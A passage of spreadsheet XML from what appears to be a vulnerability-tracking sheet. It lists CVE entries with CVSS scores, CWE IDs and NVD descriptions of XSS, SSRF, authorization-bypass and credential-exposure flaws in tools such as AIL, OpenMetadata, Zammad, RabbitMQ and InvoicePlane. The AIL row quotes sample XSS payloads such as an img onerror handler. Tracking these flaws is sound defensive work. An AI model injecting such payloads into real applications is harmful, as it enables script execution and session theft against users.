      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework tag selector component (var/www/static/js/tags.js) is vulnerable to stored cross-site scripting (XSS). A user with the ability to create a custom tag could embed an HTML payload containing JavaScript event handlers (e.g., &lt;img src=x onerror=alert(1)&gt; or &lt;svg onload=...&gt;) in the tag name. When another authenticated user opened a page containing the tag selector, the malicious tag name was inserted into the DOM using jQuery's html property, causing the embedded script to execute in the victim's browser context.
The vulnerable code paths affected both the suggestion/combo-item rendering (_renderComboItems) and the selected-tag rendering logic. In both cases, the display value derived from the tag's displayField was passed directly to the html property of a jQuery element constructor, which parses and inserts the string as raw HTML rather than as text.
Preconditions: the attacker must have an authenticated account with permission to create custom tags, and the victim must be an authenticated user who views a page that renders the tag selector with the attacker's stored tag. The attack is stored (persistent) and does not require the victim to perform any action beyond loading the page.
Security impact: successful exploitation allows arbitrary JavaScript execution in the victim's browser within the application's origin, potentially leading to session hijacking, unauthorized data access, form manipulation, or further client-side attacks.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100174</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100373</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>OpenMetadata through 2.0.2 contains a server-side request forgery vulnerability in the URLValidator.validateURL function that fails to properly resolve DNS hostnames and validate internal addresses. Users permitted to create or update EventSubscription can set webhook destinations to internal hosts, allowing the server to send requests to private networks and cloud metadata endpoints while returning HTTP status codes that enable blind SSRF probing.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100373</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56726</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>github, gitlab</t>
        </is>
      </c>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, this vulnerability breaks normal ticket isolation boundaries between agents. Any authenticated agent, even one with no active tickets assigned to them, can view the titles, status, labels, and URL links of GitHub/GitLab issues attached to any ticket in the system. This allows an internal user to systematically view GitHub/GitLab issue data linked by other agents or administrators across the organization by simply querying random or sequential ticket IDs. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56726</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6087</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/categories' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6087</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6088</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/categories' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6088</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63205</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when creating or updating an email signature, Zammad processes inline images referenced in the signature body. If a signature body contains an HTML img tag pointing to any existing attachment, the system copies that attachment into a new signature-owned record, without checking whether the user has permission to access the original attachment. The newly created copy is then downloadable by the same channel-admin user, because attachment access is determined by the copy's owner (the signature), not the original object (e.g., a ticket or knowledge-base article). This allows a user with any of the admin.channel_email, admin.channel_google, admin.channel_microsoft365, or admin.channel_microsoft_graph permissions to read attachments they would otherwise be denied access to, such as ticket attachments belonging to groups they are not a member of. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63205</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67407</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3 and 4.2.9 and 4.1.14 and 4.0.23, Incomplete fix for CVE-2026-44838: escaperegexchar/1 does not escape -, leaving room for an MQTT topic permission bypass. the CVE-2026-44838 fix made expandtopicpermission/2 escape regex metacharacters in expanded topic-permission variables (escaperegex(V)), but escaperegexchar/1 escapes \ ^ $ . | ? + ( ) [ ] { } and omits -. When a topic permission template places {clientid} inside a [...] character class A low-privileged authenticated MQTT user controlling its clientid can broaden topic authorization (read and write) when templates embed {clientid} in a [...] This issue is fixed in versions 4.3.3 and 4.2.9 and 4.1.14 and 4.0.23.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67407</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100502</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an insufficient session expiration vulnerability in the login endpoint that allows attackers with former admin access to obtain tokens with arbitrary lifespans by supplying unvalidated duration parameters. Attackers can mint near-permanent administrator tokens that survive password changes, retaining full control of the dashboard since tokens are verified only against a static JWT secret that is never rotated.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100502</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17602</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.7.42 via the 'file_name' parameter parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17602</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39372</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-359</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane stores and serves uploaded image attachments without stripping EXIF metadata. When an administrator uploads an image through invoice attachments, quote attachments, or another attachment feature and shares it with another user, the recipient can retrieve embedded GPS coordinates, timestamps, and device information. The preserved metadata can disclose private location and device details across users. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39372</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67241</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, AMQP 1.0 management exchange.declare skips alternate-exchange permission check. pUT /exchanges/:name (lines 192-240) checks only configure on the declared exchange and passes XArgs straight to rabbitexchange:declare/7. It omits the checkreadpermitted(X) + checkwritepermitted(AE) that rabbitchannel.erl:2540-2548 enforces for the alternate-exchange argument on the AMQP 0-9-1 path. The same file already implements the analogous DLX check for queues (lines 708-719), confirming this is a missing-check bug rather than intentional A user with only configure on exchange X can route X's unroutable messages into an alternate exchange they have no write permission AMQP 1.0 enabled (default in RabbitMQ 4.x) Attacker has configure on at least one exchange but lacks write on the target. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67241</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85292</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's User_Controller compares the session user_type value with the required role by using PHP's loose inequality operator. Under a non-standard session backend that returns unexpected scalar types, type juggling can cause a value that is not strictly the required role to pass the authorization check. This can permit authentication or authorization bypass in affected session configurations. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85292</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85293</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-87</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2-beta-1, InvoicePlane stores client_email values without enforcing email syntax and renders them unescaped inside double-quoted value attributes in the invoice mailer form and quote mailer form. An administrator who can edit a client can store attribute-breaking input, and, when the mailer is configured, JavaScript executes when another authenticated administrator opens the related mailer page. The script runs in the InvoicePlane origin and can perform same-origin actions with the victim's session. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85293</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67406</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3, 4.2.9, 4.1.14, and 4.0.23, Shovel does not format state logged by the crash reporter and can leave unencrypted credentials in a crash dump file. the shovel worker genserver processes does not implement the formatstatus/2 callback. When these processes crash (e.g., due to network partitions, connection failures), the OTP SASL error handler writes the full process state , including plaintext AMQP passwords and URIs , to the error log. This is particularly severe for the shovel worker, which stores deobfuscated plaintext URIs (including amqp://user:password@host format) in its genserver state for the entire process Automatic Credential Exposure: Shovel worker crashes (common during network partitions) automatically write plaintext upstream/downstream passwords to error logs No Special Configuration Needed: Unlike DEBUG logging, SASL error reports are always active Broad. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, and 4.0.23.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67406</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80430</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
